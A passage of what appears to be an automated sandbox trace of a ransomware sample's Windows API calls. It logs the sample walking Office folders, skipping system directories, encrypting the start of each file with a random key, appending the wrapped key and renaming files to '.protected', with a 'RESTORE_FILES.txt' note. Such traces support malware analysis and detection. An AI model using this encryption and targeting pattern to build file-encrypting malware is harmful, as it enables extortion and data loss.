lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.713] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.714] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.714] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.714] CloseHandle (hObject=0xd8) returned 1 [0067.715] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll.protected") returned 81 [0067.715] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll.protected")) returned 1 [0067.715] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.715] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="Windows") returned -1 [0067.715] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="Program Files") returned -1 [0067.715] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.715] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.715] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="System Volume Information") returned -1 [0067.715] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll") returned 72 [0067.715] StrStrIW (lpFirst="MSOINTL.REST.trx_dll", lpSrch=".protected") returned 0x0 [0067.716] lstrcmpW (lpString1="MSOINTL.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.716] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.716] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.716] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.716] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll") returned 72 [0067.716] StrStrW (lpFirst="MSOINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0067.716] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll") returned 72 [0067.716] StrStrW (lpFirst="MSOINTL.REST.trx_dll", lpSrch=".rar") returned 0x0 [0067.716] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll") returned 72 [0067.716] StrStrW (lpFirst="MSOINTL.REST.trx_dll", lpSrch=".zip") returned 0x0 [0067.716] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.735] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.735] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.736] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.736] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.743] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.743] CloseHandle (hObject=0xd8) returned 1 [0067.744] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll.protected") returned 82 [0067.744] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll.protected")) returned 1 [0067.744] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.744] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0067.745] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="Program Files") returned -1 [0067.745] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.745] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.745] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0067.745] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll") returned 71 [0067.745] StrStrIW (lpFirst="OMSINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0067.745] lstrcmpW (lpString1="OMSINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.745] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.745] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.745] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.745] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll") returned 71 [0067.746] StrStrW (lpFirst="OMSINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0067.746] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll") returned 71 [0067.746] StrStrW (lpFirst="OMSINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0067.746] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll") returned 71 [0067.746] StrStrW (lpFirst="OMSINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0067.746] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.777] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.777] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.779] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.781] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.792] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.792] CloseHandle (hObject=0xd8) returned 1 [0067.793] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll.protected") returned 81 [0067.793] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll.protected")) returned 1 [0067.794] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.794] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0067.794] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="Program Files") returned -1 [0067.794] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.794] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.794] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0067.794] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll") returned 70 [0067.794] StrStrIW (lpFirst="ONINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0067.794] lstrcmpW (lpString1="ONINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.794] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.794] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.794] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.795] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll") returned 70 [0067.795] StrStrW (lpFirst="ONINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0067.795] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll") returned 70 [0067.795] StrStrW (lpFirst="ONINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0067.795] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll") returned 70 [0067.795] StrStrW (lpFirst="ONINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0067.795] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.810] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.810] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.811] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.811] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.827] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.828] CloseHandle (hObject=0xd8) returned 1 [0067.828] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll.protected") returned 80 [0067.828] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll.protected")) returned 1 [0067.829] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.829] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="Windows") returned -1 [0067.829] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="Program Files") returned -1 [0067.829] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.829] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.829] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="System Volume Information") returned -1 [0067.829] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll") returned 71 [0067.829] StrStrIW (lpFirst="ONINTL.REST.trx_dll", lpSrch=".protected") returned 0x0 [0067.829] lstrcmpW (lpString1="ONINTL.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.829] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.829] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.829] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.832] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll") returned 71 [0067.832] StrStrW (lpFirst="ONINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0067.832] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll") returned 71 [0067.832] StrStrW (lpFirst="ONINTL.REST.trx_dll", lpSrch=".rar") returned 0x0 [0067.832] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll") returned 71 [0067.832] StrStrW (lpFirst="ONINTL.REST.trx_dll", lpSrch=".zip") returned 0x0 [0067.832] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.883] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.883] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.884] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.884] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.893] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.894] CloseHandle (hObject=0xd8) returned 1 [0067.894] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll.protected") returned 81 [0067.894] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll.protected")) returned 1 [0067.895] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.895] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="Windows") returned -1 [0067.895] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="Program Files") returned -1 [0067.895] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.895] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.895] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0067.895] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll") returned 72 [0067.895] StrStrIW (lpFirst="OUTLLIBR.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0067.895] lstrcmpW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.895] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.895] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.895] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.898] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll") returned 72 [0067.898] StrStrW (lpFirst="OUTLLIBR.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0067.898] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll") returned 72 [0067.898] StrStrW (lpFirst="OUTLLIBR.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0067.898] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll") returned 72 [0067.898] StrStrW (lpFirst="OUTLLIBR.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0067.898] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.899] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.899] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.900] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.900] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.915] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.915] CloseHandle (hObject=0xd8) returned 1 [0067.949] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll.protected") returned 82 [0067.949] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll.protected")) returned 1 [0067.949] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.949] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="Windows") returned -1 [0067.949] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="Program Files") returned -1 [0067.949] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.949] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.949] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="System Volume Information") returned -1 [0067.949] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll") returned 73 [0067.949] StrStrIW (lpFirst="OUTLLIBR.REST.trx_dll", lpSrch=".protected") returned 0x0 [0067.949] lstrcmpW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.949] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.950] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.950] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.950] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll") returned 73 [0067.950] StrStrW (lpFirst="OUTLLIBR.REST.trx_dll", lpSrch=".txt") returned 0x0 [0067.950] lstrlenW 